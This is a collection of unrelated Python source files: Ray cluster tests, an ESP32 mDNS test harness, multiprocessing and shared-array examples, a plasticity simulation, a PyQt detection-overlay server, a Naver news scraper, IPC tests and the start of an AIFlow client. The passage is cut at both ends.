# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 1, timeout=2)
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=2)
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(removing_node, allow_graceful=True)
with pytest.raises(RayTestTimeoutException):
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 3, timeout=2)
# There is no connection error to a dead node.
info = relevant_errors(ray_constants.RAYLET_CONNECTION_ERROR)
assert len(info) == 0
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8
}],
indirect=True)
@pytest.mark.parametrize("num_actors", [1, 2, 5])
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head, num_actors):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(num_actors)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 2,
"object_store_memory": 10**8
}],
indirect=True)
def test_fill_object_store_exception(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_direct_call_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
while ray.worker.global_worker.core_worker.object_exists(obj):
time.sleep(1)
# ray.get throws an exception.
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_direct_call_serialized_id_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
@ray.remote
def get(obj_ids):
obj_id = obj_ids[0]
assert (isinstance(ray.get(obj_id), np.ndarray))
# Wait for the object to be evicted.
ray.internal.free(obj_id)
while ray.worker.global_worker.core_worker.object_exists(obj_id):
time.sleep(1)
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(obj_id)
print("get done", obj_ids)
obj = large_object.remote()
result = get.remote([obj])
ray.internal.free(obj)
ray.get(result)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_ids, test_dependent_task):
print("get", obj_ids)
obj_id = obj_ids[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_id)) == 1
else:
assert ray.get(obj_id) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
proc_5.py | # -*- coding: utf-8 -*-
# @Time : 2021/3/16 20:25
# @Author : sen
from multiprocessing import Process, Queue
import os, time, random
# 写数据进程执行的代码:
def write(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# 读数据进程执行的代码:
def read(q):
print('Process to read: %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__=='__main__':
# 父进程创建Queue,并传给各个子进程:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# 启动子进程pw,写入:
pw.start()
# 启动子进程pr,读取:
pr.start()
# 等待pw结束:
pw.join()
# pr进程里是死循环,无法等待其结束,只能强行终止:
pr.terminate() |
app_test.py | # SPDX-FileCopyrightText: 2021 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
import re
import select
import socket
import struct
import time
from threading import Event, Thread
import dpkt
import dpkt.dns
import ttfw_idf
from tiny_test_fw.Utility import console_log
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
# This service is created from esp board startup
SERVICE_NAME = u'ESP32-WebServer._http._tcp.local'
SUB_SERVICE_NAME = u'_server._sub._http._tcp.local'
# This host name answer sent by host, when there is query from board
HOST_NAME = u'tinytester.local'
# This servce answer sent by host, when there is query from board
MDNS_HOST_SERVICE = u'ESP32._http._tcp.local'
stop_mdns_listener = Event()
start_mdns_listener = Event()
esp_service_answered = Event()
esp_sub_service_answered = Event()
esp_host_answered = Event()
esp_delegated_host_answered = Event()
# Get query of ESP32-WebServer._http._tcp.local service
def get_mdns_service_query(service): # type:(str) -> dpkt.dns.Msg
dns = dpkt.dns.DNS()
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_SRV
arr.name = service
arr.target = socket.inet_aton('127.0.0.1')
arr.srvname = service
dns.qd.append(arr)
console_log('Created mdns service query: {} '.format(dns.__repr__()))
return dns.pack()
# Get query of _server_.sub._http._tcp.local sub service
def get_mdns_sub_service_query(sub_service): # type:(str) -> dpkt.dns.Msg
dns = dpkt.dns.DNS()
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_PTR
arr.name = sub_service
arr.target = socket.inet_aton('127.0.0.1')
arr.ptrname = sub_service
dns.qd.append(arr)
console_log('Created mdns subtype service query: {} '.format(dns.__repr__()))
return dns.pack()
# Get query for host resolution
def get_dns_query_for_esp(esp_host): # type:(str) -> dpkt.dns.Msg
dns = dpkt.dns.DNS()
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.name = esp_host + u'.local'
dns.qd.append(arr)
console_log('Created query for esp host: {} '.format(dns.__repr__()))
return dns.pack()
# Get mdns answer for host resoloution
def get_dns_answer_to_mdns(tester_host): # type:(str) -> dpkt.dns.Msg
dns = dpkt.dns.DNS()
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
dns. an.append(arr)
console_log('Created answer to mdns query: {} '.format(dns.__repr__()))
return dns.pack()
# Get mdns answer for service query
def get_dns_answer_to_service_query(mdns_service): # type:(str) -> dpkt.dns.Msg
dns = dpkt.dns.DNS()
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.name = mdns_service
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_SRV
arr.priority = 0
arr.weight = 0
arr.port = 100
arr.srvname = mdns_service
arr.ip = socket.inet_aton('127.0.0.1')
dns. an.append(arr)
console_log('Created answer to mdns query: {} '.format(dns.__repr__()))
return dns.pack()
def mdns_listener(esp_host): # type:(str) -> None
print('mdns_listener thread started')
UDP_IP = '0.0.0.0'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.setblocking(False)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack('4sl', socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
last_query_timepoint = time.time()
QUERY_TIMEOUT = 0.2
while not stop_mdns_listener.is_set():
try:
start_mdns_listener.set()
current_time = time.time()
if current_time - last_query_timepoint > QUERY_TIMEOUT:
last_query_timepoint = current_time
timeout = max(0, QUERY_TIMEOUT - (current_time - last_query_timepoint))
read_socks, _, _ = select.select([sock], [], [], timeout)
if not read_socks:
continue
data, _ = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0:
if dns.qd[0].name == HOST_NAME:
console_log('Received query: {} '.format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(HOST_NAME), (MCAST_GRP,UDP_PORT))
if dns.qd[0].name == HOST_NAME:
console_log('Received query: {} '.format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(HOST_NAME), (MCAST_GRP,UDP_PORT))
if dns.qd[0].name == MDNS_HOST_SERVICE:
print(dns.qd[0].name)
console_log('Received query: {} '.format(dns.__repr__()))
sock.sendto(get_dns_answer_to_service_query(MDNS_HOST_SERVICE), (MCAST_GRP,UDP_PORT))
if len(dns.an) == 1:
if dns.an[0].name == SERVICE_NAME:
console_log('Received answer to service query: {}'.format(dns.__repr__()))
esp_service_answered.set()
if len(dns.an) > 1:
if dns.an[1].name == SUB_SERVICE_NAME:
console_log('Received answer for sub service query: {}'.format(dns.__repr__()))
esp_sub_service_answered.set()
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
console_log('Received answer to esp32-mdns query: {}'.format(dns.__repr__()))
esp_host_answered.set()
if dns.an[0].name == esp_host + u'-delegated.local':
console_log('Received answer to esp32-mdns-delegate query: {}'.format(dns.__repr__()))
esp_delegated_host_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
def create_socket(): # type:() -> socket.socket
UDP_IP = '0.0.0.0'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.setblocking(False)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack('4sl', socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
return sock
def test_query_dns_http_service(service): # type: (str) -> None
print('SRV: Query {}'.format(service))
sock = create_socket()
sock.sendto(get_mdns_service_query(service), (MCAST_GRP,UDP_PORT))
if not esp_service_answered.wait(timeout=25):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
def test_query_dns_sub_service(sub_service): # type: (str) -> None
print('PTR: Query {}'.format(sub_service))
sock = create_socket()
sock.sendto(get_mdns_sub_service_query(sub_service), (MCAST_GRP,UDP_PORT))
if not esp_sub_service_answered.wait(timeout=25):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
def test_query_dns_host(esp_host): # type: (str) -> None
print('A: {}'.format(esp_host))
sock = create_socket()
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
if not esp_host_answered.wait(timeout=25):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
def test_query_dns_host_delegated(esp_host): # type: (str) -> None
print('A: {}'.format(esp_host))
sock = create_socket()
sock.sendto(get_dns_query_for_esp(esp_host + '-delegated'), (MCAST_GRP,UDP_PORT))
if not esp_delegated_host_answered.wait(timeout=25):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
@ttfw_idf.idf_custom_test(env_tag='Example_WIFI', group='test-apps')
def test_app_esp_mdns(env, _): # type: (ttfw_idf.TinyFW.Env, None) -> None
dut1 = env.get_dut('mdns', 'tools/test_apps/protocols/mdns', dut_class=ttfw_idf.ESP32DUT)
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r'mdns hostname set to: \[([^\]]+)\]'), timeout=30)[0]
esp_ip = dut1.expect(re.compile(r' IPv4 address: ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)'), timeout=30)
print('Got IP={}'.format(esp_ip[0]))
mdns_responder = Thread(target=mdns_listener, args=(str(specific_host),))
def start_case(case, desc, result): # type: (str, str, str) -> None
print('Starting {}: {}'.format(case, desc))
dut1.write(case)
dut1.expect(re.compile(result), timeout=10)
try:
# start dns listener thread
mdns_responder.start()
# wait untill mdns listener thred started
if not start_mdns_listener.wait(timeout=5):
raise ValueError('Test has failed: mdns listener thread did not start')
# query dns service from host, answer should be received from esp board
test_query_dns_http_service(SERVICE_NAME)
# query dns sub-service from host, answer should be received from esp board
test_query_dns_sub_service(SUB_SERVICE_NAME)
# query dns host name, answer should be received from esp board
test_query_dns_host(specific_host)
# query dns host name delegated, answer should be received from esp board
test_query_dns_host_delegated(specific_host)
# query dns-host from esp board, answer should be received from host
start_case('CONFIG_TEST_QUERY_HOST', 'Query tinytester.local', 'tinytester.local resolved to: 127.0.0.1')
# query dns-host aynchrounusely from esp board, answer should be received from host
start_case('CONFIG_TEST_QUERY_HOST_ASYNC', 'Query tinytester.local async', 'Async query resolved to A:127.0.0.1')
# query service from esp board, answer should be received from host
start_case('CONFIG_TEST_QUERY_SERVICE', 'Query SRV ESP32._http._tcp.local', 'SRV:ESP32')
finally:
stop_mdns_listener.set()
mdns_responder.join()
if __name__ == '__main__':
test_app_esp_mdns()
|
test_shared_ndarray.py | import multiprocessing as mp
import unittest
import numpy as np
from . import SharedNDArray, SharedNDArrayError
class TestSharedNDArray(unittest.TestCase):
def test_create(self):
try:
shm = SharedNDArray(4)
shm.array[0] = 1
def write_to_shm(q):
shm = q.get()
shm.array += 1
q = mp.Queue()
p = mp.Process(target=write_to_shm, args=(q,))
p.start()
q.put(shm)
p.join()
self.assertEqual(shm.array[0], 2)
finally:
shm.unlink()
def test_unlink_twice(self):
shm = SharedNDArray(4)
shm.unlink()
with self.assertRaises(SharedNDArrayError):
shm.unlink()
def test_unlink_two_processes(self):
shm = SharedNDArray(4)
q = mp.Queue()
p = mp.Process(target=lambda q: q.get().unlink(), args=(q,))
p.start()
q.put(shm)
p.join()
with self.assertRaises(SharedNDArrayError):
shm.unlink()
def test_copy(self):
try:
arr = np.array(range(4))
shm = SharedNDArray.copy(arr)
self.assertEqual(arr.shape, shm.array.shape)
self.assertEqual(arr.dtype, shm.array.dtype)
self.assertTrue((arr == shm.array).all())
finally:
shm.unlink()
def test_zeros_like(self):
try:
arr = np.array(range(4))
shm = SharedNDArray.zeros_like(arr)
self.assertEqual(arr.shape, shm.array.shape)
self.assertEqual(arr.dtype, shm.array.dtype)
self.assertTrue((shm.array == 0).all())
finally:
shm.unlink()
if __name__ == '__main__':
unittest.main()
|
sim.py | #!/usr/bin/env python3
import csv
import numpy
import multiprocessing
def sigmoid(x):
return 1.0/(1.0+numpy.exp(-(x-5.0)))
def sim_func(q,alpha,beta,Nalpha,Nbeta):
#parameters
time_pitch=1.0 #ms
save_pitch=10
save_pitch_weight=1000
simlen_sec=900.0
simlen=int(simlen_sec*1000.0/time_pitch)
tauL=10.0 #ms
phi=80.0/1000.0
phi_input=80.0/1000.0
alpha_som=alpha
alpha_dnd=alpha
beta_som=beta
beta_dnd=beta
gamma=1.0
c0=70.0
eta_som=0.2
eta_dnd=0.2
taudeltaW=1.0*1000.0 #ms
tau_mean=60.0*1000.0
eta_Wdecay=1e-7
Wnoise_amp=5e-3/numpy.sqrt(time_pitch)
som_input_num=50
dnd_input_num=som_input_num+0
group1_num=10
input_src_num=4
tau_input=10.0 #ms
input_amp=0.1/numpy.sqrt(time_pitch)
noise_amp=0.1/numpy.sqrt(time_pitch)
Winit=5.0
Wmin=0.0
E0=0.05
#variables
x=0.0
y=0.0
Ex=E0
Ey=E0
input_src=numpy.zeros(input_src_num)
som_input_current=numpy.zeros(som_input_num)
dnd_input_current=numpy.zeros(dnd_input_num)
som_inputPSC=numpy.zeros(som_input_num)
dnd_inputPSC=numpy.zeros(dnd_input_num)
deltaWsom=numpy.zeros(som_input_num)
deltaWdnd=numpy.zeros(dnd_input_num)
Wsom=Winit*(numpy.random.rand(som_input_num))
Wdnd=Winit*(numpy.random.rand(dnd_input_num))
som_src=numpy.zeros([som_input_num, input_src_num])
som_src[:group1_num, 0]=1.0
som_src[group1_num:, 2]=1.0
dnd_src=numpy.zeros([dnd_input_num, input_src_num])
dnd_src[:group1_num,0]=1.0
dnd_src[group1_num:,3]=1.0
#simulation
for t in range(simlen):
time_sec=float(t)*time_pitch/1000.0
#if time_sec==int(time_sec):
# print(time_sec,"sec")
#source signal
input_src=input_src+time_pitch*(-input_src/tau_input+input_amp*numpy.random.randn(input_src_num))
#inputs
som_input_current+=time_pitch*(-som_input_current/tauL+som_src@input_src+noise_amp*numpy.random.randn(som_input_num))
dnd_input_current+=time_pitch*(-dnd_input_current/tauL+dnd_src@input_src+noise_amp*numpy.random.randn(dnd_input_num))
som_input=phi_input*sigmoid(som_input_current)
dnd_input=phi_input*sigmoid(dnd_input_current)
som_inputPSC+=time_pitch*(-som_inputPSC/tauL+som_input)
dnd_inputPSC+=time_pitch*(-dnd_inputPSC/tauL+dnd_input)
#dynamics
xprev=x+0.0
yprev=y+0.0
Isom=Wsom@som_inputPSC
Idnd=Wdnd@dnd_inputPSC
x=sigmoid(Isom+beta_som*yprev)
y=sigmoid(Idnd+beta_dnd*xprev)
z=(1.0+gamma*y)*phi*x
#plasticity
#som
Wsom+=time_pitch*(eta_som*deltaWsom+Wnoise_amp*numpy.random.randn(som_input_num)-eta_Wdecay*Wsom)
Wsom[Wsom<Wmin]=Wmin
theta_som=c0*Ex*Ex
deltaWsom+=time_pitch*(-deltaWsom+((1.0-alpha_som)*x*(x-theta_som)+alpha_som*x*y)*(1.0-x)*som_inputPSC)/taudeltaW
#dnd
Wdnd+=time_pitch*(eta_dnd*deltaWdnd+Wnoise_amp*numpy.random.randn(dnd_input_num)-eta_Wdecay*Wdnd)
Wdnd[Wdnd<Wmin]=Wmin
theta_dnd=c0*Ey*Ey
deltaWdnd+=time_pitch*(-deltaWdnd+((1.0-alpha_dnd)*y*(y-theta_dnd)+alpha_dnd*x*y)*(1.0-y)*dnd_inputPSC)/taudeltaW
Ex+=time_pitch*(-Ex+x)/tau_mean
Ey+=time_pitch*(-Ey+y)/tau_mean
wdif_som=numpy.sum(Wsom[:group1_num])-numpy.sum(Wsom[group1_num:])
wdif_dnd=numpy.sum(Wdnd[:group1_num])-numpy.sum(Wdnd[group1_num:])
q.put((Nalpha,Nbeta,wdif_som,wdif_dnd))
if __name__=="__main__":
alpha=numpy.arange(0.0,1.0,0.1)
beta=numpy.arange(0.0,10.0,1.0)
max_process=40
que=multiprocessing.Queue()
process_arr=[]
results=[]
process_num=0
for i in range(len(alpha)):
for j in range(len(beta)):
print(alpha[i],beta[j])
process_arr.append(multiprocessing.Process(target=sim_func, args=(que,alpha[i],beta[j],i,j)))
process_arr[-1].start()
process_num+=1
if process_num>=max_process:
for k in range(process_num):
process_arr[k].join()
for k in range(process_num):
tmp=que.get()
results.append(tmp)
process_arr.clear()
process_num=0
for i in range(process_num):
process_arr[i].join()
for k in range(process_num):
tmp=que.get()
results.append(tmp)
numpy.savetxt("alpha.csv", alpha, delimiter=",")
numpy.savetxt("beta.csv", beta, delimiter=",")
numpy.savetxt("wdif.csv", results, delimiter=",")
|
QtServer.py | import threading
import sys
sys.path.insert(0,'..')
import os
from utils import label_map_util
from screen_overlay_handler import *
import socket
import pickle
import numpy as np
from PyQt5.QtCore import *
from PyQt5.QtWidgets import QApplication
import sys
import screen_overlay_handler
"""
COPYRIGHT @ Grebtsew 2019
QtServer recieves detection boxes and visualize them.
"""
MAX_DETECTION = 5
MAX_BOX_AREA = 1000000 # pixels^2
PRECISION = 0.6 # 60 % detection treshhold
MAX_DETECTION = 5
WIDTH = 1920
HEIGTH = 1080
SHOW_ONLY = ["person"]
BOX_VIS_TIME = 0.2 # in seconds
# Dont change these
list = []
queue = []
class QtServer(threading.Thread):
"""
This server recieves boxes and shows them in pyqt5
"""
def __init__(self, address, port):
super(QtServer,self).__init__()
self.address = address
self.port = port
self.categorylist = self.load_tf_categories()
def load_tf_categories(self):
self.NUM_CLASSES = 90
CWD_PATH = os.path.dirname(os.getcwd())
self.PATH_TO_LABELS = os.path.join(CWD_PATH,'object_detection', 'data', 'mscoco_label_map.pbtxt')
self.label_map = label_map_util.load_labelmap(self.PATH_TO_LABELS)
self.categories = label_map_util.convert_label_map_to_categories(self.label_map, max_num_classes=self.NUM_CLASSES, use_display_name=True)
self.category_index = label_map_util.create_category_index(self.categories)
return self.categories
def handle_connection(self, conn):
with conn:
while True:
data = conn.recv(50000) # approx larger than the incoming tf result
if not data:
break
else:
try:
dict = pickle.loads(data)
except Exception:
continue # If for some reason not entire package is recieved!
boxes = np.squeeze(dict[0])
scores = np.squeeze(dict[1])
classification = np.squeeze(dict[2])
amount = np.squeeze(dict[3])
# loop through all detections
for i in range(0,len(boxes)):
# Calculate rescale rectangle
x = int(WIDTH*boxes[i][1])
y = int(HEIGTH*boxes[i][0])
w = int(WIDTH*(boxes[i][3]-boxes[i][1]))
h = int(HEIGTH*(boxes[i][2]-boxes[i][0]))
c = ""
# Check category in bounds
if len(self.categorylist) >= classification[i]:
c = str(self.categorylist[int(classification[i]-1)]['name'])
if len(SHOW_ONLY) > 0: # dont show wrong items
if not SHOW_ONLY.__contains__(c):
continue
if scores[i] > PRECISION: # precision treshold
if w*h < MAX_BOX_AREA : # max box size check
queue.append((scores[i], c,x,y,w,h)) # save all vis data in queue
def run(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((self.address, self.port))
s.listen()
print("Qt Server started at ", self.address, self.port )
while True:
conn, addr = s.accept()
threading.Thread(target=self.handle_connection, args=(conn,)).start()
def show_rect(scores, c,x,y,w,h):
list.append((screen_overlay_handler.create_box_with_image_score_classification("../images/square2.png",scores,c,x,y,w,h), time.time()))
def remove_old_detections():
for box in list:
if time.time() - box[1] > BOX_VIS_TIME:
list.remove(box);
def paint_rects():
if len(queue) > 0:
for box in queue:
show_rect(box[0],box[1],box[2],box[3],box[4],box[5])
queue.clear()
else:
time.sleep(0.1)
remove_old_detections()
if __name__ == '__main__':
app = QApplication(sys.argv) # create window handler
QtServer_address= [["127.0.0.1",8081]]
qtserver = QtServer(QtServer_address[0][0],QtServer_address[0][1])
qtserver.start()
while True: # Paint all incoming boxes on MAIN thread (required!)
paint_rects()
|
naverpop.py | import requests
import time
import sys
import json
from urllib import parse
from bs4 import BeautifulSoup
from threading import Thread
mod = sys.modules[__name__]
global totalNewsData
totalNewsData = {}
def getRankList():
rankList = []
url = "https://www.naver.com"
req = requests.get(url)
soup = BeautifulSoup(req.text,"html.parser")
for item in soup.select(".ah_roll_area .ah_k"):
rankList.append(item.text)
return rankList
def append_list(idx,keyword):
global totalNewsData
tempList = []
search_url = "https://search.naver.com/search.naver?where=nexearch&sm=tab_jum&query="+ parse.quote(keyword)
req = requests.get(search_url)
soup = BeautifulSoup(req.text,"html.parser")
for item2,item3 in zip(soup.select("._prs_nws_all dl"),soup.select("._prs_nws_all .thumb img")):
news_thumb = item3.get("src")
news_title = item2.select("a")[0].get("title")
news_des = item2.select("dd")[1].text
news_link = item2.select("a")[0].get("href")
news_data = {
"news_thumb" : news_thumb,
"news_title" : news_title,
"news_des": news_des,
"news_link" : news_link,
}
tempList.append(news_data)
totalNewsData.update({idx:{"keyword":keyword,"data":tempList}})
def auto_run():
global totalNewsData
totalNewsData = {}
rank_list = getRankList()
# startTime = time.time() #시작한시간
# 동적 변수 할당 #
for idx,item in enumerate(rank_list):
setattr(mod, "th{}".format(idx+1), Thread(target=append_list ,args=(str(idx+1),item)))
# 동적 변수 할당 #
# 동적으로 생성된 변수(쓰레드) 실행 #
for idx,item in enumerate(rank_list):
getattr(mod, 'th{}'.format(idx+1)).start()
for idx,item in enumerate(rank_list):
getattr(mod, 'th{}'.format(idx+1)).join()
# 동적으로 생성된 변수(쓰레드) 실행 #
# endTime = time.time() - startTime # 끝난시간
# print("총",endTime,"초 소요됬습니다")
# print(totalNewsData)
totalNewsData = json.dumps(totalNewsData)
f = open("new_list.json","w",encoding='utf8')
f.write(str(totalNewsData))
f.close() |
test_ipc2.py | import pytest
def test_pack_unpack():
header = ('json', 301)
from gpopup.ipc import _pack_header, _unpack_header
header_bytes = _pack_header(*header)
header_out = _unpack_header(header_bytes)
assert header == header_out
assert header[0] == header_out.type
assert header[1] == header_out.length
def test_test_get_client(IpcServer):
Client = IpcServer.get_client()
c = Client()
s = IpcServer()
assert c.sock_name == s.sock_name
def test_ping(echo_client):
assert echo_client.ping() == True
def test_pargs(echo_client):
pargs = 9, 8, 7
args, kw = echo_client.echo(*pargs)
assert pargs == args
assert {} == kw
def test_kwargs(echo_client):
kwargs = {
'a': [0,1,2],
'b': 'some string',
'c': print,
}
args, kw = echo_client.echo(**kwargs)
assert () == args
assert kwargs == kw
def test_adding_cmds(MathServer):
Client = MathServer.get_client()
assert 'cos' in Client.__dict__
assert 'erf' in Client.__dict__
def test_calc(math_client):
import math
c = math_client
assert c.cos(0.5) == pytest.approx(math.cos(0.5))
assert c.erf(0.1) == pytest.approx(math.erf(0.1))
def test_json(IpcServer):
assert IpcServer.serial_method == 'pickle'
IpcServer.serial_method = 'json'
assert IpcServer.serial_method == 'json'
Client = IpcServer.get_client()
assert Client.serial_method == 'json'
c = Client()
c.start_server_maybe()
pargs, kwargs = c.echo(42)
assert c.serial_method == 'json'
assert kwargs == {}
assert pargs == [42,]
c.kill_server()
def test_no_server(IpcServer):
Client = IpcServer.get_client()
with pytest.raises(ConnectionError):
Client().ping()
def test_busy(IpcServer):
serv = IpcServer()
serv2 = IpcServer()
assert serv.sock_name == serv2.sock_name
Client = serv.get_client()
c = Client()
with pytest.raises(ConnectionError):
c.ping()
serv.run(background=True)
assert c.ping() == True
assert serv2.run() == False
c.kill_server()
def test_foreground(IpcServer):
serv = IpcServer()
Client = serv.get_client()
c = Client()
with pytest.raises(ConnectionError):
c.ping()
import threading
run = lambda: serv.run(background=False)
t = threading.Thread(target=run)
t.start()
assert c.ping() == True
assert c.echo(37, wow='okay') == ((37,), {'wow': 'okay'})
c.kill_server()
t.join(1)
def test_fail_cmd(echo_client):
assert echo_client.run_cmd('ping') == True
with pytest.raises(AttributeError):
echo_client.run_cmd('asdfasdf', 1, 3)
|
aiflow_client.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import threading
from random import shuffle
import grpc
import logging
import time
from functools import wraps
from ai_flow.project.project_config import ProjectConfig
from ai_flow.rest_endpoint.protobuf.deploy_service_pb2_grpc import DeployServiceStub
from ai_flow.rest_endpoint.protobuf.high_availability_pb2 import ListMembersRequest, ReturnStatus
from ai_flow.rest_endpoint.protobuf.high_availability_pb2_grpc import HighAvailabilityManagerStub
from ai_flow.rest_endpoint.protobuf.metadata_service_pb2_grpc import MetadataServiceStub
from ai_flow.rest_endpoint.protobuf.metric_service_pb2_grpc import MetricServiceStub
from ai_flow.rest_endpoint.protobuf.model_center_service_pb2_grpc import ModelCenterServiceStub
from ai_flow.rest_endpoint.service.high_availability import proto_to_member, sleep_and_detecting_running
from notification_service.base_notification import BaseEvent
from ai_flow.notification.event_types import AI_FLOW_TYPE
from ai_flow.rest_endpoint.service.client.deploy_client import DeployClient
from ai_flow.rest_endpoint.service.client.metadata_client import MetadataClient
from ai_flow.rest_endpoint.service.client.model_center_client import ModelCenterClient
from notification_service.client import NotificationClient
from ai_flow.rest_endpoint.service.client.metric_client import MetricClient
if not hasattr(time, 'time_ns'):
time.time_ns = lambda: int(time.time() * 1e9)
_SERVER_URI = 'localhost:50051'
class AIFlowClient(MetadataClient, ModelCenterClient, NotificationClient, DeployClient, MetricClient):
"""
Client of an AIFlow Server that manages metadata store, model center and notification service.
"""
def __init__(self,
server_uri=_SERVER_URI,
notification_service_uri=None,
project_config: ProjectConfig = None):
MetadataClient.__init__(self, server_uri)
ModelCenterClient.__init__(self, server_uri)
DeployClient.__init__(self, server_uri)
MetricClient.__init__(self, server_uri)
